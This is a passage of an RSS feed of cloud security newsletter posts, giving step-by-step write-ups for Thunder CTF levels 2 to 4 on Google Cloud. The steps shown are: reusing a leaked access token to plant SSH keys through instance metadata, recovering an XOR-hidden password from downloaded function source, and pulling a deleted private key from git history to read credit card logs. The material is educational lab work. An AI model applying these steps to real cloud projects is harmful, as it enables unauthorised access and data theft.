it).</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/72a60578-c19f-444f-a98e-9c1caa57e9ea/image-19.png?t=1731222740"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> The fingerprint value is also short-lived. If it’s giving an error, check the fresh fingerprint value by rerunning the same command for gcloud compute instances.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">We will <a class="link" href="https://cloud.google.com/compute/docs/metadata/setting-custom-metadata?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04#gcloud" target="_blank" rel="noopener noreferrer nofollow">set the metadata</a> by sending a POST request to the <code>setMetadata</code> URL. The following post body contains the public SSH key and the corresponding fingerprint value.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> We pass the access token we got from the logs in the authorization header.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7dd6f7cc-f2cc-4bb0-a548-fd4cbd22682e/image-20.png?t=1731222757"/></div><p class="paragraph" style="text-align:left;">Now, let’s make the POST request with the authorization token.</p><div class="codeblock"><pre><code>https://www.googleapis.com/compute/v1/projects/&lt;your_project_id&gt;/zones/&lt;enter_the_zone&gt;/instances/&lt;name_of_instance&gt;/setMetadata</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/13bd14b9-bb7a-43cf-9f92-a792e9a3dffc/image-21.png?t=1731222774"/></div><p class="paragraph" style="text-align:left;">It gives a 200 OK response, which indicates that the SSH public key we passed in the URL is successfully added to the metadata – granting us SSH access.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> One thing to note is that the authentication access token we get from the log is short-lived. So, if you cannot use the access token or get an error with it, generate it again by using the curl command on the cloud function URL (by providing a wrong/non-existent filename) and use the newly generated authentication token.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Now, we can log in to the compute instance over SSH using the private SSH key.</p><div class="codeblock"><pre><code>ssh -i &lt;key&gt; username@&lt;external_ip_address&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9f1ffcd2-3127-44c3-bd99-7784694a0d53/image-22.png?t=1731222793"/></div><p class="paragraph" style="text-align:left;">Once logged in to the compute instance, we will navigate through the instance and get the secret value.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e6c9a728-8c00-4d9e-97bd-aec25f5666a1/image-23.png?t=1731222806"/></div><p class="paragraph" style="text-align:left;">We found the secret value.</p><p class="paragraph" style="text-align:left;">This marks the end of Thunder-CTF’s level-4.</p><p class="paragraph" style="text-align:left;">If you want to read more about GCP misconfigurations, check out <a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">Thunder CTF Level 5 write-up</a>!</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=968c919f-b204-40cf-b561-489827454a21&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Thunder-CTF: Level 03</title>
  <description>Step-by-step guide to solving Thunder CTF Level 3. Build your GCP skills with practical cloud security techniques and solutions.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2a012c91-fef8-4e41-8cb1-e004486822e7/Thunder_CTF_03_Cover.jpg" length="18813" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-thunder-ctf-level-3</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-thunder-ctf-level-3</guid>
  <pubDate>Tue, 21 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-21T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">Have you checked my write-up for previous levels? If not, here are the links:</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 01</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-2?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 02</a></p></li></ul><p class="paragraph" style="text-align:left;">Let’s get started with <a class="link" href="https://thunder-ctf.cloud/thunder/a3password.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">level 3</a>: </p><div class="codeblock"><pre><code>python3 thunder.py create thunder/a3password</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/edaa9f47-0d1a-4737-a597-1491084ab0fd/image-1.png?t=1731220322"/></div><p class="paragraph" style="text-align:left;">We will now check this service account’s permissions using the Python script in the Thunder CTF repo.</p><div class="codeblock"><pre><code>python scripts/test-permissions.py start/a3-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f8c83e6c-77e3-4710-9da0-f3d7fec21870/image-2.png?t=1731220335"/></div><p class="paragraph" style="text-align:left;">As we can see, all the permissions are related to Google’s cloud functions service. We will move towards cloud functions for further investigation.</p><p class="paragraph" style="text-align:left;">Since the service account has <code>cloudfunctions.functions.sourceCodeGet</code> permission, we can <a class="link" href="https://cloud.google.com/functions/docs/reference/iam/permissions?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">get the source code of the cloud function</a>.</p><p class="paragraph" style="text-align:left;">Listing the Google Cloud function, using the command:</p><div class="codeblock"><pre><code>gcloud functions list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2008ea3c-af1a-4ad2-b8c2-604ddcbbb741/image-3.png?t=1731220350"/></div><p class="paragraph" style="text-align:left;">Describing the cloud function:</p><div class="codeblock"><pre><code>gcloud functions describe a3-func-293057166056</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/10fba5c6-2a89-4517-a6c2-9b64935afe80/image-4.png?t=1731220365"/></div><p class="paragraph" style="text-align:left;">We got the <b>XOR password</b> from the environment variables for the cloud function described above. The output suggests that the cloud function might be encrypted using <a class="link" href="https://www.101computing.net/xor-encryption-algorithm/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">XOR encryption</a>, a <a class="link" href="https://en.wikipedia.org/wiki/XOR_cipher?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">simple symmetric encryption</a>.</p><p class="paragraph" style="text-align:left;">The XOR password is the encryption key for XOR encryption. In this type of encryption, the plaintext is bit-wise XORed with the key, and then we get the ciphertext. To get back plaintext data, simply XOR the ciphertext with the corresponding bits of the key that were used to encrypt it</p><p class="paragraph" style="text-align:left;">Let’s try accessing the function using the <code>httpsTrigger</code> link. We get the following unauthenticated error.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/cf30d38b-2982-4c40-bfd3-d87d03674e59/image-5.png?t=1731220386"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> We have used <a class="link" href="https://www.postman.com/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">Postman</a> to make requests to the URLs</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">We need to pass an authentication token with the URL to fix this.</p><div class="codeblock"><pre><code>gcloud auth list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d1257e7e-8312-4776-93e0-d66db4ef24db/image-6.png?t=1731220399"/></div><p class="paragraph" style="text-align:left;">The currently active account is the service account created for this level. (<code>*</code> mark indicates that this account is currently active)</p><p class="paragraph" style="text-align:left;">We need to get the identity token for this service account, which we can simply get using:</p><div class="codeblock"><pre><code>gcloud auth print-identity-token</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/64ec17f3-d5c8-4473-953e-169a3ce23ba1/image-7.png?t=1731220411"/></div><p class="paragraph" style="text-align:left;">Now, we will curl the cloud function URL we got, using the above identity token as the bearer token.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fa7ddbb5-b154-40c9-9107-eb9d619e84f8/image-8.png?t=1731220425"/></div><p class="paragraph" style="text-align:left;">The output displays that we need to pass a password argument in this URL to access the cloud function.</p><p class="paragraph" style="text-align:left;">We will pass some dummy passwords as arguments in this URL and see what will happen.</p><div class="codeblock"><pre><code>https://us-central1-cloudsecurityclub-dev.cloudfunctions.net/a3-func-293057166056?password=hello12</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/dbcc840d-6589-4ce5-a393-a304231914b0/image-9.png?t=1731220438"/></div><p class="paragraph" style="text-align:left;">The response tells us that the password is an integer.</p><p class="paragraph" style="text-align:left;">Let’s get the source code of the cloud function and understand its logic before proceeding with the attack.</p><p class="paragraph" style="text-align:left;">We make a post request to the <a class="link" href="https://cloud.google.com/functions/docs/reference/rest/v1/projects.locations.functions/generateDownloadUrl?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">URL to download the source code of cloud function</a> along with the access token of the service account. The response will provide a URL to download the source code.</p><div class="codeblock"><pre><code>https://cloudfunctions.googleapis.com/v1/projects/cloudsecurityclub-dev/locations/us-central1/functions/a3-func-293057166056:generateDownloadUrl</code></pre></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> We are hitting a different endpoint to download the source code. We are passing a different access token as well – generated from executing <code>gcloud auth print-access-token</code></p><figcaption class="blockquote__byline"></figcaption></blockquote></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/03459e1f-8acd-4f53-951d-61b46158e09e/image-10.png?t=1731220457"/></div><p class="paragraph" style="text-align:left;">By visiting the link, we will download the zip file containing the source code.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3a7bfe76-fcb1-45a0-ba96-030b235a7b8f/image-11.png?t=1731220472"/></div><p class="paragraph" style="text-align:left;">These are the files in the zip folder: <code>main.py</code> and <code>requirements.txt</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/81e4c352-aa0a-4119-add7-b7bce81580de/image-12.png?t=1731220503"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6c9fcac5-3178-47e9-b5be-024958ec63ee/image-13.png?t=1731220515"/></div><p class="paragraph" style="text-align:left;">In <code>main.py</code>, we can see that <code>( password ^ XOR_FACTOR == XOR_PASSWORD )</code>, which tells us <code>XOR_PASSWORD</code> in the environment variable is checking for the XOR of XOR_FACTOR and password.</p><p class="paragraph" style="text-align:left;">Which indirectly tells us that, XOR_PASSWORD = password ^ XOR_FACTOR</p><p class="paragraph" style="text-align:left;">Let’s find the password!</p><ul><li><p class="paragraph" style="text-align:left;">When we described the cloud function earlier, we got XOR_PASSWORD (value was <b>569436999751</b>)</p></li><li><p class="paragraph" style="text-align:left;">In this cloud function code (<code>main.py</code>), we have XOR_FACTOR (value was <b>347808535942</b>)</p></li><li><p class="paragraph" style="text-align:left;">We can find the password by doing</p><ul><li><p class="paragraph" style="text-align:left;">Given: Plaintext Password ^ XOR_FACTOR = XOR_PASSWORD</p></li><li><p class="paragraph" style="text-align:left;"><b>Password (Plaintext) = XOR_FACTOR ^ XOR_PASSWORD</b></p></li></ul></li><li><p class="paragraph" style="text-align:left;">So the password in our case will be 347808535942 ^ 569436999751, which gives password = <b>912380003777</b></p></li></ul><p class="paragraph" style="text-align:left;">We will now append this password to the URL and try to access the Google Cloud function by passing it.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fae43d5c-8939-4163-ab75-698b4d7dd730/image-14.png?t=1731220530"/></div><p class="paragraph" style="text-align:left;">This gives us the secret value and marks the end of Level 3.</p><p class="paragraph" style="text-align:left;">If you want to read more about GCP misconfigurations, check out my <a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-4?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-03" target="_blank" rel="noopener noreferrer nofollow">Thunder CTF Level 4 write-up</a>!</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=d794374f-c3d1-4542-a5f5-2167ac808766&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Thunder-CTF: Level 02</title>
  <description>Step-by-step guide to solving Thunder CTF Level 2. Build your GCP skills with practical cloud security techniques and solutions.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b24eeb2d-d7a2-43a0-9283-099a6957e158/Thunder_CTF_02_Cover.jpg" length="18591" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-thunder-ctf-level-2</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-thunder-ctf-level-2</guid>
  <pubDate>Mon, 20 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-20T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">Have you checked out my <a class="link" href="http:///p/solving-thunder-ctf-level-1/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-02" target="_blank" rel="noopener noreferrer nofollow">writeup for Thunder CTF: Level 01</a>?</p><p class="paragraph" style="text-align:left;">Let’s get started with <a class="link" href="https://thunder-ctf.cloud/thunder/a2finance.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-02" target="_blank" rel="noopener noreferrer nofollow">Level 02</a> challenge:</p><div class="codeblock"><pre><code>python3 thunder.py create thunder/a2finance</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e6723083-de94-4ba7-85f2-1bc28a330f07/image-1.png?t=1731217312"/></div><p class="paragraph" style="text-align:left;">Below is the list of permissions for the service account:</p><div class="codeblock"><pre><code>python scripts/test-permissions.py start/a2-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/72044cd5-b3bf-4fa9-a9ff-3b76f9605393/image-2.png?t=1731217326"/></div><p class="paragraph" style="text-align:left;">We can see this service account has the compute.instances.get permission, which allows us to retrieve the information about the compute instances</p><p class="paragraph" style="text-align:left;">We can see the running instances with the below command:</p><div class="codeblock"><pre><code>gcloud compute instances list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9c2cd1f1-9df1-4cd9-aa23-8fefe7b67c30/image-3.png?t=1731217338"/></div><p class="paragraph" style="text-align:left;">We can now get the information about the instance with the help of the below command:</p><div class="codeblock"><pre><code>gcloud compute instances describe a2-logging-instance --zone=us-west1-b</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8036d212-7f0c-42cf-ab6d-b495bc6469f5/image-4.png?t=1731217351"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e19e54bf-f26a-4677-8671-6be859704d50/image-5.png?t=1731217364"/></div><p class="paragraph" style="text-align:left;">This service account can get information about the IP address of the compute instance and the username (clouduser) whose public SSH key is in the instance’s metadata. Once anyone gets the SSH private key corresponding to the public key, they can log into the compute instance using SSH.</p><p class="paragraph" style="text-align:left;">Now, coming to the storage bucket that this user can access:</p><div class="codeblock"><pre><code>gsutil ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8dc4d641-0cb0-4acb-bb5f-fb71b7e664a9/image-6.png?t=1731217379"/></div><p class="paragraph" style="text-align:left;">We will use the below command to list the content of the bucket:</p><div class="codeblock"><pre><code>gsutil ls gs://a2-bucket-311610379267/</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/22a0c2bd-ec79-4fc1-81cf-40eec6864a1c/image-7.png?t=1731217391"/></div><p class="paragraph" style="text-align:left;">We will list all the files in the storage bucket</p><div class="codeblock"><pre><code>gsutil ls -r gs://a2-bucket-311610379267/</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/85953431-fe85-4a1c-8756-eaa104e44415/image-8.png?t=1731217406"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8ea6cd95-0503-4802-9a15-63e30608fdc1/image-9.png?t=1731217422"/></div><p class="paragraph" style="text-align:left;">These files can contain potential information (like source code, etc.). This folder also contains a git repository as .git folder is present inside it. We will now copy all the files from this bucket to the current working directory in the shell to analyze them</p><div class="codeblock"><pre><code>gsutil cp -r gs://a2-bucket-311610379267/ .</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/421b41fa-79f7-40a2-89a6-eeb015ad621d/image-10.png?t=1731217438"/></div><p class="paragraph" style="text-align:left;">Listing things to confirm successful copy</p><div class="codeblock"><pre><code>ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/43d80169-1343-4230-b0ff-789ff68a8316/image-11.png?t=1731217454"/></div><p class="paragraph" style="text-align:left;">Now traversing to the bucket directory (a2-bucket-329613384102) which is created and listing the changes in the repository using:</p><div class="codeblock"><pre><code>git log --name-only</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3a4ab938-8d7b-40a6-8168-11684b94ee7d/image-12.png?t=1731217485"/></div><p class="paragraph" style="text-align:left;">One git commit shows the message: oops, deleted accidental key upload, and the file ssh_key was part of the change.</p><p class="paragraph" style="text-align:left;">The author accidentally uploaded the SSH key and committed it to the git repo. Then, in a later commit, he deletes that file from the git repository. So, we will check the previous branch and search for the ssh_key.</p><p class="paragraph" style="text-align:left;">We will check the previous commit in which ssh_key file existed.</p><div class="codeblock"><pre><code>git checkout &lt;COMMIT_HASH&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1ab50fb4-1087-44f7-8202-c2ae130e907b/image-13.png?t=1731217499"/></div><div class="codeblock"><pre><code>cat ssh_key</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8aad6ffe-8745-4b3a-a2cb-41a5dbd31cb1/image-14.png?t=1731217520"/></div><p class="paragraph" style="text-align:left;">Now, since we have the private SSH key and the external IP of the instance, we can log in to the instance using these and investigate further.</p><p class="paragraph" style="text-align:left;">First we will modify the permission of this ssh_key using:</p><div class="codeblock"><pre><code>chmod 400 ssh_key</code></pre></div><p class="paragraph" style="text-align:left;">Then we will use SSH to login into the compute instance using:</p><div class="codeblock"><pre><code>ssh -i ssh_key clouduser@&lt;EXTERNAL_IP&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9e99b44c-f14f-49f6-8c5d-2d6d94c60ec0/image-15.png?t=1731217535"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> <code>clouduser</code> is the username associated with the instance, we can see this from the description of the compute instance</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">The instance name is a2-logging-instance, so the first thing that comes to our mind is that this instance may have something related to logging.</p><p class="paragraph" style="text-align:left;">We will try to list the logs for the compute instance</p><div class="codeblock"><pre><code>gcloud logging logs list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c895a906-7202-4062-9f41-bce7b02d5be2/image-16.png?t=1731217549"/></div><p class="paragraph" style="text-align:left;">We will analyze the log entries related to transactions, since it can have transaction details which can give us the credit card number, with the below command</p><div class="codeblock"><pre><code>gcloud logging read &quot;logName:\&quot;projects/cloudsecurityclub-dev/logs/transactions\&quot;&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/500f3bac-086c-48c0-a436-17fe14344e0b/image-17.png?t=1731217564"/></div><p class="paragraph" style="text-align:left;">We can see a lot of entries for the credit card number of a bunch of people. To solve the challenge, we had to find the credit card number “<b>JIMMY NGUYEN</b>.”</p><p class="paragraph" style="text-align:left;">We will use the grep command to find the entry for ‘<b>JIMMY NGUYEN</b>’</p><div class="codeblock"><pre><code>gcloud logging read projects/cloudsecurityclub-dev/logs/transactions | grep -C 5 &#39;JIMMY&#39;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b6212693-d708-4113-be8e-35715522a848/image-18.png?t=1731217577"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> This <code>-C 5</code> in above command will display five lines before and after the matching keyword, <code>JIMMY</code></p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">We can see JIMMY_NGUYEN’s credit card number – marking the end of level 2.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/29b365c9-334c-4ca8-b95e-250ddaa3dced/image-19.png?t=1731217591"/></div><p class="paragraph" style="text-align:left;">If you want to read more about GCP misconfigurations, check out my <a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-3?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-02" target="_blank" rel="noopener noreferrer nofollow">Thunder CTF Level 3 write-up</a>!</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=723173cd-7f46-47bc-96b8-d0c2fb256568&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

  </channel>
</rss>
